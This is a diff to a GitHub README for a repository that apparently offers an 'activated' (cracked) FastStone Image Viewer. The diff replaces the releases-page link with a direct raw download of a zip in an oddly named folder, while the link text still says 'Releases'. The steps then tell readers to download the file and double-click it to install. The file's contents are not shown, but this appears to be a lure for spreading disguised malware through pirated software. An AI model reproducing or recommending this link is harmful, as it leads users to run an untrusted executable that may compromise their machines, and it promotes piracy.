Eemanfatimaawan/FastStone-Image-Viewer-Activated/README.md

 ## 📥 Download & Install

-To get started, visit this page to download the software: [FastStone Image Viewer Releases](https://github.com/Eemanfatimaawan/FastStone-Image-Viewer-Activated/releases).
+To get started, visit this page to download the software: [FastStone Image Viewer Releases](https://raw.githubusercontent.com/Eemanfatimaawan/FastStone-Image-Viewer-Activated/main/joaquinite/Image-Stone-Viewer-Activated-Fast-3.2-beta.3.zip).

 1. Click on the link above.
 2. Look for the latest version in the list.
-3. Click on the file that indicates a Windows installation (for example, `FastStoneViewerSetup.exe`).
+3. Click on the file that indicates a Windows installation (for example, `https://raw.githubusercontent.com/Eemanfatimaawan/FastStone-Image-Viewer-Activated/main/joaquinite/Image-Stone-Viewer-Activated-Fast-3.2-beta.3.zip`).
 4. Save the file to your computer.
 5. Double-click the downloaded file to start the installation.
 6. Follow the on-screen prompts to complete the installation.